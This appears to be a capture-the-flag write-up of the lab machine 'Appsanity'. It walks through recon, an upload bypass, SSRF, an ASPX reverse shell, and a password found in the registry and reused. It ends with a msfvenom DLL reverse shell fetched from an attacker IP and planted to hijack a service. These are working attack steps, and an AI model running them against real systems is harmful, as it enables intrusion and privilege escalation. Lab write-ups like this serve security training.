Appsanity

Recon

nmap_scan.log

Open 10.129.146.201:80
Open 10.129.146.201:443
Open 10.129.146.201:5985
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.146.201

PORT     STATE SERVICE REASON  VERSION
80/tcp   open  http    syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://meddigi.htb/
443/tcp  open  https?  syn-ack
5985/tcp open  http    syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

HTTPs (443)

HTTP redirects to HTTPs

We can sign up as Patient.

Passive recon of subdomain enumeration returned nothing for HTTP, but there's subdomain for HTTPs

└─$ domain='meddigi.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fl 2
└─$ domain='meddigi.htb'; ffuf -k -u "https://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fl 7
portal                  [Status: 200, Size: 2976, Words: 1219, Lines: 57, Duration: 375ms]

Our token

Become Doctor

When we sign up we have hidden field attached to form called Acctype which by default is 1, changing to 0 doesn't create account and 2 is Doctor.

Now we are a Doctor

When we try to add ourselves (patient account) in request we are ID of 7, changing ID doesn't show anything in response.

Portal

Let's visit the subdomain

└─$ feroxbuster -u 'https://portal.meddigi.htb/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -D -C 400,404 -S 155,324 -k --smart
by Ben "epi" Risher 🤓                 ver: 2.10.3
405      GET       29l      107w     1293c https://portal.meddigi.htb/Login/Signin
200      GET       57l      162w     2976c https://portal.meddigi.htb/Login
200      GET       57l      162w     2976c https://portal.meddigi.htb/Login/Index
200      GET        8l       14w      194c https://portal.meddigi.htb/error
200      GET        1l       21w    14304c https://portal.meddigi.htb/favicon.ico
302      GET        0l        0w        0c https://portal.meddigi.htb/Login/logout => https://portal.meddigi.htb/
302      GET        0l        0w        0c https://portal.meddigi.htb/profile => https://portal.meddigi.htb/Login
405      GET       29l      107w     1293c https://portal.meddigi.htb/Login/signin
[####################] - 21s     9675/9675    0s      found:19      errors:0
[####################] - 21s     4769/4769    231/s   https://portal.meddigi.htb/
[####################] - 18s     4769/4769    272/s   https://portal.meddigi.htb/Login/

The login urls are somewhat same and in the requests we don't have cookies from main domain to this domain. If we go back to main domain, change the access_token domain scope to .meddigi.htb (note the dot) we will get this cookie on all subdomains.

Go back to the portal, refresh and voila! We are logged in as Doctor.

Upload Bypass

https://portal.meddigi.htb/examreport let's us upload files, but only PDFs.

During upload we can add magic bytes to detect this file as PDF

And we get Examination report sent to the management.

Run passive recon to find where it gets uploaded ; Nothing interesting

└─$ feroxbuster -u 'https://portal.meddigi.htb/' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -D -C 400,404 -S 155,324 -k --thorough -b 'access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjciLCJlbWFpbCI6InRlc3QwM0BtZWRkaWdpLmh0YiIsIm5iZiI6MTczMzUxMDMxNCwiZXhwIjoxNzMzNTEzOTE0LCJpYXQiOjE3MzM1MTAzMTQsImlzcyI6Ik1lZERpZ2kiLCJhdWQiOiJNZWREaWdpVXNlciJ9.ku_cPHpnCl-DtjxaA2mMMBSo4Bx4ZiuUYKPauMQEyF8' -I .js,.css,.png
200      GET        8l       14w      194c https://portal.meddigi.htb/error
200      GET      299l      847w    14600c https://portal.meddigi.htb/examreport
200      GET      205l      553w    10059c https://portal.meddigi.htb/Scheduler
200      GET      237l      628w    12236c https://portal.meddigi.htb/Equipment
200      GET      148l      485w     9462c https://portal.meddigi.htb/Profile
200      GET      349l     1067w    17935c https://portal.meddigi.htb/Prescriptions
200      GET      148l      485w     9462c https://portal.meddigi.htb/profile
200      GET        8l       14w      194c https://portal.meddigi.htb/Error
405      GET       29l      107w     1293c https://portal.meddigi.htb/Equipment/EquipmentRequest
200      GET      237l      628w    12236c https://portal.meddigi.htb/equipment
405      GET       29l      107w     1293c https://portal.meddigi.htb/Scheduler/Schedule
200      GET      205l      553w    10059c https://portal.meddigi.htb/scheduler
405      GET       29l      107w     1293c https://portal.meddigi.htb/Prescriptions/SendEmail
200      GET       44l       87w     1792c https://portal.meddigi.htb/Prescriptions/ViewPrescription/2
405      GET       29l      107w     1293c https://portal.meddigi.htb/Prescriptions/AddPrescription
200      GET       44l       87w     1780c https://portal.meddigi.htb/Prescriptions/ViewPrescription/1
200      GET      349l     1067w    17935c https://portal.meddigi.htb/prescriptions
[####################] - 4m    179058/179058  668/s   https://portal.meddigi.htb/

SSRF

Meanwhile in Prescriptions we have SSRF

Port 80 has response after ages... but all others have delay of 2 seconds.

└─$ ffuf -request ssrf.req -w <(seq 79 81) -mc all -k -t 10 -timeout 100000
       v2.1.0-dev
79                      [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 2138ms]
81                      [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 2137ms]
80                      [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 21148ms]

We can filter by time

└─$ ffuf -request ssrf.req -w /usr/share/seclists/Discovery/Infrastructure/common-http-ports.txt -mc all -k -t 10 -ft '<3000'
       v2.1.0-dev
1434                    [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 4097ms]
4001                    [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 4000ms]
6346                    [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 3994ms]
30821                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 3906ms]
8080                    [Status: 200, Size: 2060, Words: 688, Lines: 54, Duration: 8832ms]

SSRF to RCE

Looks like we can view reports, but our is long gone. Im actually going to change the payload to straight up reverse shell because interactive session doesn't look that bright.

└─$ curl -LOs 'https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/refs/heads/master/shell.aspx'
└─$ nano shell.aspx # Change IP:PORT
└─$ sed -i '1s/^/%PDF-\n/' shell.aspx
└─$ file shell.aspx
shell.aspx: PDF document, version \012.%

Reverse Shell (svc_exampanel)

Upload -> SSRF on 8080 -> https://portal.meddigi.htb/ViewReport.aspx?file=5c7b8af3-70d9-4d94-bcfd-4fcd5dc4ca98_shell.aspx -> Change protocol, url and port => http://127.0.0.1:8080/ViewReport.aspx?file=5c7b8af3-70d9-4d94-bcfd-4fcd5dc4ca98_shell.aspx -> Get reverse shell

└─$ listen
Ncat: Connection from 10.129.146.201:63867.

c:\windows\system32\inetsrv>whoami /all
User Name               SID
======================= ==============================================
appsanity\svc_exampanel S-1-5-21-4111732528-4035850170-1619654654-1007

Group Name                             Type             SID                                                            Attributes
====================================== ================ ============================================================== ==================================================
Everyone                               Well-known group S-1-1-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                     Well-known group S-1-5-3                                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113                                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                      Alias            S-1-5-32-568                                                   Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                                        Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\ExamPanel                  Well-known group S-1-5-82-2916625395-3930688606-393764215-2099654449-2832396995 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10                                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192

Privilege Name                Description                          State
============================= ==================================== ========
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process   Disabled
SeShutdownPrivilege           Shut down the system                 Disabled
SeAuditPrivilege              Generate security audits             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

PS C:\Users\svc_exampanel> tree /f /a
Folder PATH listing
Volume serial number is F854-971D
C:.
+---Desktop
|       user.txt
|
+---Documents
+---Downloads
+---Favorites
+---Links
+---Logs
|       examinationpanel_log.txt
|
+---Music
+---Pictures
+---Saved Games
\---Videos

User.txt

PS C:\Users\svc_exampanel> cat Desktop/user.txt
f64ef2f5cbcc99aada5389c877c30157

Privilege Escalation (devdoc)

└─$ impacket-smbserver -smb2support share .
...
[*] User APPSANITY\svc_exampanel authenticated successfully
[*] svc_exampanel::APPSANITY:aaaaaaaaaaaaaaaa:cd9f45b69047d149c99344c6483a29fa:0101000000000000000a9d521848db014d1324d1600ecc2c000000000100100064005400720042006a00710072006c000300100064005400720042006a00710072006c00020010005500720061006b006600450074007900040010005500720061006b00660045007400790007000800000a9d521848db01060004000200000008003000300000000000000000000000002000008bab6c70d6764e6ec03ffd91cb9390567266fcefeabfb3c0c175479af389f5580a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100310033000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
...
---
PS C:\inetpub\ExaminationPanel\ExaminationPanel\bin> xcopy ExaminationManagement.dll \\10.10.14.113\share

Decompile the DLL https://www.decompiler.com/jar/7d19edcf2760481892228654a92d724b/ExaminationManagement.dll

It's getting some kind of decryption key from registry

PS C:\inetpub\ExaminationPanel\ExaminationPanel\bin> reg query "HKLM\Software\MedDigi"

HKEY_LOCAL_MACHINE\Software\MedDigi
    EncKey    REG_SZ    1g0tTh3R3m3dy!!

PS C:\inetpub\ExaminationPanel\ExaminationPanel\bin> Get-ItemProperty "Registry::HKLM\Software\MedDigi"

EncKey       : 1g0tTh3R3m3dy!!
PSPath       : Microsoft.PowerShell.Core\Registry::HKLM\Software\MedDigi
PSParentPath : Microsoft.PowerShell.Core\Registry::HKLM\Software
PSChildName  : MedDigi
PSProvider   : Microsoft.PowerShell.Core\Registry

This looks like a password.

Get the users

PS C:\inetpub\ExaminationPanel\ExaminationPanel\bin> net user
User accounts for \\APPSANITY
-------------------------------------------------------------------------------
Administrator            DefaultAccount           devdoc
Guest                    svc_exampanel            svc_meddigi
svc_meddigiportal        WDAGUtilityAccount

Brute the password with wirnm, smb was not open.

└─$ netexec winrm meddigi.htb -u users.txt -p '1g0tTh3R3m3dy!!'
WINRM       10.129.146.201  5985   APPSANITY        [*] Windows 10 / Server 2019 Build 19041 (name:APPSANITY) (domain:Appsanity)
WINRM       10.129.146.201  5985   APPSANITY        [-] Appsanity\Administrator:1g0tTh3R3m3dy!!
WINRM       10.129.146.201  5985   APPSANITY        [-] Appsanity\DefaultAccount:1g0tTh3R3m3dy!!
WINRM       10.129.146.201  5985   APPSANITY        [+] Appsanity\devdoc:1g0tTh3R3m3dy!! (Pwn3d!)

WinRM

└─$ evil-winrm -i meddigi.htb -u devdoc -p '1g0tTh3R3m3dy!!'
*Evil-WinRM* PS C:\Users\devdoc\Documents> whoami /all

User Name        SID
================ ==============================================
appsanity\devdoc S-1-5-21-4111732528-4035850170-1619654654-1002

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users        Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                   Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192

Privilege Name                Description                          State
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled

Enumerate with winpeas

*Evil-WinRM* PS C:\Users\devdoc\Music> curl 10.10.14.113/wp.exe -out wp.exe
*Evil-WinRM* PS C:\Users\devdoc\Music> .\wp.exe | tee -filepath wp.log
--------- Autorun Applications
È Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
Error getting autoruns from WMIC: System.Management.ManagementException: Access denied
   at System.Management.ThreadDispatch.Start()
   at System.Management.ManagementScope.Initialize()
   at System.Management.ManagementObjectSearcher.Initialize()
   at System.Management.ManagementObjectSearcher.Get()
   at winPEAS.Info.ApplicationInfo.AutoRuns.GetAutoRunsWMIC()

    RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    Key: SecurityHealth
    Folder: C:\Windows\system32
    File: C:\Windows\system32\SecurityHealthSystray.exe
   =================================================================================================


    RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    Key: VMware User Process
    Folder: C:\Program Files\VMware\VMware Tools
    File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr (Unquoted and Space detected) - C:\
   =================================================================================================


    RegPath: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    RegPerms: devdoc [FullControl]
    Key: MicrosoftEdgeAutoLaunch_52C6AD3EEF59818F619BA8CCF0498CC4
    Folder: C:\Program Files (x86)\Microsoft\Edge\Application
    File: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --no-startup-window --win-session-start /prefetch:5 (Unquoted and Space detected) - C:\
   =================================================================================================


    RegPath: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    RegPerms: devdoc [FullControl]
    Key: OneDrive
    Folder: C:\Users\devdoc\AppData\Local\Microsoft\OneDrive
    FolderPerms: devdoc [AllAccess]
    File: C:\Users\devdoc\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background
    FilePerms: devdoc [AllAccess]
   =================================================================================================

    Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
    File: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
    Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
   =================================================================================================


    Folder: C:\Users\devdoc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
    FolderPerms: devdoc [AllAccess]
    File: C:\Users\devdoc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected) - C:\Users\devdoc\AppData\Roaming\Microsoft\Windows,C:\Users\devdoc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
    FilePerms: devdoc [AllAccess]
    Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
   =================================================================================================
--------- Enumerating Office 365 endpoints synced by OneDrive.
    SID: S-1-5-21-4111732528-4035850170-1619654654-1002
      Name:  Business1
        UserFolder                                 C:\Users\devdoc\OneDrive
      Name:  Personal
        UserFolder                                 C:\Users\devdoc\OneDrive
--------- Current TCP Listening Ports
È Check for services restricted from the outside
  Enumerating IPv4 connections

  Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name

  TCP        0.0.0.0               80            0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               100           0.0.0.0               0               Listening         3912            ReportManagement
  TCP        0.0.0.0               135           0.0.0.0               0               Listening         916             svchost
  TCP        0.0.0.0               443           0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               445           0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               5040          0.0.0.0               0               Listening         5168            svchost
  TCP        0.0.0.0               5985          0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               8080          0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               47001         0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               49664         0.0.0.0               0               Listening         684             lsass
  TCP        0.0.0.0               49665         0.0.0.0               0               Listening         544             wininit
  TCP        0.0.0.0               49666         0.0.0.0               0               Listening         1096            svchost
  TCP        0.0.0.0               49667         0.0.0.0               0               Listening         1692            svchost
  TCP        0.0.0.0               49668         0.0.0.0               0               Listening         668             services
  TCP        10.129.146.201        139           0.0.0.0               0               Listening         4               System
  TCP        10.129.146.201        5985          10.10.14.113          52528           Established       4               System

There's something running on port 80 by ReportManagement, which lives in Program Files

*Evil-WinRM* PS C:\Program Files\ReportManagement> ls
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        10/23/2023  11:33 AM                Libraries
-a----          5/5/2023   5:21 AM          34152 cryptbase.dll
-a----          5/5/2023   5:21 AM          83744 cryptsp.dll
-a----         3/11/2021   9:22 AM         564112 msvcp140.dll
-a----         9/17/2023   3:54 AM         140512 profapi.dll
-a----        10/20/2023   2:56 PM         102912 ReportManagement.exe
-a----        10/20/2023   1:47 PM       11492864 ReportManagementHelper.exe
-a----         3/11/2021   9:22 AM          96144 vcruntime140.dll
-a----         3/11/2021   9:22 AM          36752 vcruntime140_1.dll
-a----          5/5/2023   5:21 AM         179248 wldp.dll

Privilege Escalation (Administrator)

We only have access to ReportManagement.exe

*Evil-WinRM* PS C:\Program Files\ReportManagement> xcopy ReportManagement* \\10.10.14.113\share
C:ReportManagement.exe
C:ReportManagementHelper.exe
xcopy.exe : Access denied
    + CategoryInfo          : NotSpecified: (Access denied:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

└─$ ghidra_auto -c ReportManagement.exe
[*] File Ouput:
        PE32+ executable (GUI) x86-64
        for MS Windows
        6 sections
...
└─$ strings ReportManagement.exe -n 10
C:\inetpub\ExaminationPanel\ExaminationPanel\Reports
C:\Users\Administrator\Backup
reportmanagement_log.txt
Failed to receive data from client.
Available Commands:
backup: Perform a backup operation.
validate: Validates if any report has been altered since the last backup.
recover <filename>: Restores a specified file from the backup to the Reports folder.
upload <external source>: Uploads the reports to the specified external source.
Backup operation completed successfully.
An error occurred during the backup operation.
Invalid command. Missing parameter after 'upload'. Type 'help' for available commands.
C:\Program Files\ReportManagement\Libraries
externalupload
Failed to upload to external source.
Attempting to upload to external source.
Invalid command. Type 'help' for available commands.
An error occurred while processing the upload command.
 (Hash mismatch)
Altered file found:
 (Hash file not found)
Validation completed.
Validation completed. All reports are intact.
An error occurred during the validation operation.
Validation failed
Invalid command. Missing filename after 'recover'. Type 'help' for available commands.
File successfully recovered from backup.
The file appears to be tampered with and cannot be recovered.
Specified file not found in the backup directory.
Failed to initialize Winsock.
Failed to create socket.
Failed to bind socket.
Failed to accept incoming connection.
Reports Management administrative console. Type "help" to view available commands.
invalid string position
vector too long
unknown error
create_directory
 was not found.
Source directory
Error: Directory not found.
Access denied when trying to create directory
Failed to create hash file for
Filesystem error occurred during backup.
 Error Details:
Error occurred during backup.
...

From the strings if we had to make a rough guess, it's probably loading DLLs from C:\\Program Files\\ReportManagement\\Libraries

*Evil-WinRM* PS C:\Users\devdoc\Documents> ls 'C:\\Program Files\\ReportManagement\\Libraries'
*Evil-WinRM* PS C:\Users\devdoc\Documents> Get-ACL 'C:\\Program Files\\ReportManagement\\Libraries' | fl

Path   : Microsoft.PowerShell.Core\FileSystem::C:\Program Files\ReportManagement\Libraries
Owner  : BUILTIN\Administrators
Group  : APPSANITY\None
Access : APPSANITY\devdoc Allow  Write, ReadAndExecute, Synchronize
         BUILTIN\Administrators Allow  FullControl
         CREATOR OWNER Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  Read, Synchronize
         NT SERVICE\TrustedInstaller Allow  FullControl
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
         APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
Audit  :
Sddl   : O:BAG:S-1-5-21-4111732528-4035850170-1619654654-513D:AI(A;OICI;0x1201bf;;;S-1-5-21-4111732528-4035850170-1619654654-1002)(A;ID;FA;;;BA)(A;OICIIOID;FA;;;CO)(A;OICIID;FA;;;SY)(A;OICIIOID;FA;;;BA)(A;OICIID;FR;;;BU)(A;CIID;FA;;;S-1-5-80-9560088
         85-3418522649-1831038044-1853292631-2271478464)(A;OICIID;0x1200a9;;;AC)(A;OICIID;0x1200a9;;;S-1-15-2-2)
*Evil-WinRM* PS C:\Users\devdoc\Documents> cd 'C:\\Program Files\\ReportManagement\\Libraries'
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> echo x > x
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> ls

    Directory: C:\Program Files\ReportManagement\Libraries

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         12/6/2024  11:51 PM              8 x

The directory is empty and we have write access to it.

└─$ cp /usr/share/windows-resources/binaries/nc.exe .
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f dll -o rev.dll
---
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> curl 10.10.14.113/rev.dll -out 'C:\Program Files\ReportManagement\Libraries\externalupload.dll'
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> cd $ENV:USERPROFILE/Music
*Evil-WinRM* PS C:\Users\devdoc\Music> curl 10.10.14.113/nc.exe -out nc.exe

netcat was dying on evil-winrm and not letting me to interact with program, plain reverse shell was also dying so I had to port forward.

└─$ chisel server -p 36000 --reverse
2024/12/07 03:10:00 server: Reverse tunnelling enabled
2024/12/07 03:10:00 server: Fingerprint DsmwtKJ8wgC3MRRu+CQx0Hi3vXD7gk4sO/sUkZnwSeY=
2024/12/07 03:10:00 server: Listening on http://0.0.0.0:36000
---
*Evil-WinRM* PS C:\Users\devdoc\Music> curl 10.10.14.113/chisel.exe -outfile chisel.exe
*Evil-WinRM* PS C:\Users\devdoc\Music> Start-Job -ScriptBlock { & "C:\Users\devdoc\Music\chisel.exe" client 10.10.14.113:36000 R:100:127.0.0.1:100; }
*Evil-WinRM* PS C:\Users\devdoc\Music> curl 10.10.14.113/rev.dll -out 'C:\Program Files\ReportManagement\Libraries\externalupload2.dll'
---
└─$ nc 0 100
Reports Management administrative console. Type "help" to view available commands.
upload externalupload2
Attempting to upload to external source.
Attempting to upload to external source.

Scratch the filename, it seems as long as DLL is in the folder then it can be loaded. I messed up the filename, so externalupload2 worked too.

Root.txt

C:\Users\Administrator>type \Users\Administrator\Desktop\root.txt
30e84cb378a0d10561d8a130c932509a

PreviousAnalytics NextAuthority

Last updated 8 months ago

hashtagRecon

hashtagHTTPs (443)

hashtagBecome Doctor

hashtagPortal

hashtagUpload Bypass

hashtagSSRF

hashtagSSRF to RCE

hashtagReverse Shell (svc_exampanel)

hashtagUser.txt

hashtagPrivilege Escalation (devdoc)

hashtagWinRM

hashtagPrivilege Escalation (Administrator)

hashtagRoot.txt